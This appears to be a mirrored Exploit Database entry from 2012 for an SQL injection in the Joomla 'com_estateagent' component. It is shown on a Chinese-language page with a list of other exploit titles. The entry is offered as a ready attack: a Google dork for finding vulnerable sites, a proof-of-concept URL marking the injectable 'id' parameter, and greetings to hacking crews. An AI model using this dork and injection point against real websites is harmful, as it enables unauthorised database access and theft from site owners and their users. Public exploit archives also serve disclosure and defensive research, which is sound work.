Joomla! Component Estate Agent – SQL Injection

Exploit Database
14 阅读

作者： xDarkSton3x

日期： 2012-04-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18728/

##################################################
# Exploit Title: joomla component (com_estateagent) SQL injection Vulnerability
# Date: 10/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category:: webapps
# Google dork: inurl:"com_estateagent"
# Tested on: linux + windows
# Vendor link: http://www.eaimproved.eu/index.php
##################################################

[~]Exploit/p0c :
http://site.com/index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team-DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ]

last Exploits
Joomla! Component Estate Agent – SQL Injection的更多信息

glFusion 1.x – SQL Injection：
rConfig 3.9.4 – ‘searchField’ Unauthenticated Root Remote Code Execution：
AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)：
GitLab Community Edition (CE) 13.10.3 – User Enumeration：
Academy LMS 6.1 – Arbitrary File Upload：
Sickbeard 0.1 – Cross-Site Request Forgery (Disable Authentication)：
ManageEngine Applications Manager 13 – ‘MenuHandlerServlet’ SQL Injection：
WordPress Theme GeoPlaces3 – Arbitrary File Upload：